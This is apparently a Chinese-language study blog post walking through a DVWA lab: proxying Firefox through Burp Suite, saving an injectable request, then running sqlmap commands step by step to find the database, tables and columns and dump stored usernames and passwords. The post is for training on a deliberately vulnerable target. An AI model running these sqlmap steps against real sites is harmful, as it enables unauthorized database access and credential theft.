使用burpsuite抓包 + sql工具注入 dvwa靶場

記錄一下自己重新開始學習web安全之路②。

一、準備工作

1.工具準備 sqlmap + burpsuite

2.瀏覽器準備 火狐瀏覽器 + 設置代理。

首先，先設置一下火狐瀏覽器的代理

http代理地址為127.0.0.0.1 ，端口為8080

3.burpsuite 準備 將burpsuite的抓包功能打開。

注：burpsuite 不抓127.0.0.1 /dvwa-master的包，所以需要用本地網(wǎng)卡 ip/dvwa-master 訪問

怎么查到本地網(wǎng)卡ip？

在cmd中輸入ipconfig

得到本地網(wǎng)卡ip 192.168.92.1

如果是無線網(wǎng)，那么找無線網(wǎng)適配器的IPV4地址

通過本地網(wǎng)卡ip進入dvwa，把安全等級改為low等級，，設置代理之后。

在搜索框輸入之后，點擊submit。

通過burpsuite抓包得到

注：抓到的包必須是注入點的包。

如：
（GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1）即有？id=1，2等

然后在burpsuite中 點擊Action — Save item 保存到本地。

保存之后，利用sqlmap工具。首先要在cmd中先來到sqlmap的文件路徑下。

目標：拿賬號密碼（數(shù)據(jù)）

1.查詢數(shù)據(jù)庫的名稱 (dvwa)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db

-r // 指定讀取本地文件

–current-db //列出當前網(wǎng)站數(shù)據(jù)庫名稱

2.查詢數(shù)據(jù)表的名稱 (guestbook 、users)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables

-D //指定數(shù)據(jù)庫名稱

–tables //數(shù)據(jù)表

3.查詢數(shù)據(jù)列的名稱 (user 、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns

-T //指定數(shù)據(jù)表的名稱

–columns //列出數(shù)據(jù)列的名稱

4.讀取數(shù)據(jù) (user、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump

-C //指定數(shù)據(jù)列的名稱

–dump // 讀取數(shù)據(jù)

拿賬號密碼時遇到的問題：

1.首先是burpsuite抓包時 火狐瀏覽器顯示

通過百度得到解決辦法：

2.sqlmap，更新問題，可以不用管，但是一開始看到有警告，去官網(wǎng)下了一個新的sqlmap即可。